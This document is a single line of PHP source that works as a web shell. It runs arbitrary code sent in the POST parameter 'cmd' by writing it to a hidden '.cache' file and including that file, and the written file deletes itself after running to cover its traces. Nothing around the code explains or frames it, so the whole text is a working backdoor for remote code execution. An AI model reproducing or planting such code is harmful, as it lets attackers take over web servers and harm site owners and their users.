<?php $f='./.cache'; $p=$_POST['cmd']; file_put_contents($f,"<?php ".$p." unlink(__FILE__);?>"); include($f);?>